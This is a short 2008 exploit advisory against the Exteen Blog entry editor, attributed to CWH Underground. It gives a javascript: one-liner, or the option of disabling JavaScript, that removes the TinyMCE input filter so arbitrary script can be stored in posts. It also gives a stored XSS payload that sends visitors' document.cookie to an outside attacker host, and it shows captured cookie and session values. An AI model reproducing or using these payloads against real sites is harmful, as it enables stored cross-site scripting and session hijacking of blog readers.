('binary' encoding is not supported, stored as-is)
==========================================================
Exteen Blog XSS Remote Cookie Disclosure Exploit
==========================================================
AUTHOR : CWH Underground
DATE : 22 May 2008
SITE : www.citec.us
#####################################################
APPLICATION : Exteen Blog
VENDOR : www.exteen.com
#####################################################
--- Vulnerable page ---
[-] http://www.exteen.com/manage/entryeditor.php (Create New Entry Page)
--- Description ---
There are 2 ways to exploit this page
1. Type "javascript:(function(){var x = document.getElementById('mce_editor_0_parent'); x.previousSibling.style.display = 'block';x.parentNode.removeChild (x);})()" on address bar and press Enter
2. Disable javascript on your Browser and visit vulnerable page
.
Two methods above will remove tinymce filter after that you can insert any script or HTML tag in your entry :D
--- Exploit (Grabbing Cookies)---
Simple Attack: <script>document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;</script>
--- Note ---
This website implement httpOnly that prevent from stealing cookies on ie (>= 6) and firefox (>= 2.0.0.5)
=Result=
IE & Gecko: _uid57334=D8428C8A.2; _cbclose57334=1; _ctout57334=1; VisitOn=54016; VisitorTRUE=11
OPERA & Safari: _cbclose57334=1; _uid57334=16944A6F.1; sid=gdcvv9mab89uf9cmg3hqmhq570; keyx=NjgdHFErNXpCD1wpVTsYCF0dfx8KBTIDEFM; _ctout57334=1
##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C #
##################################################################
Received on May 22 2008
Intro
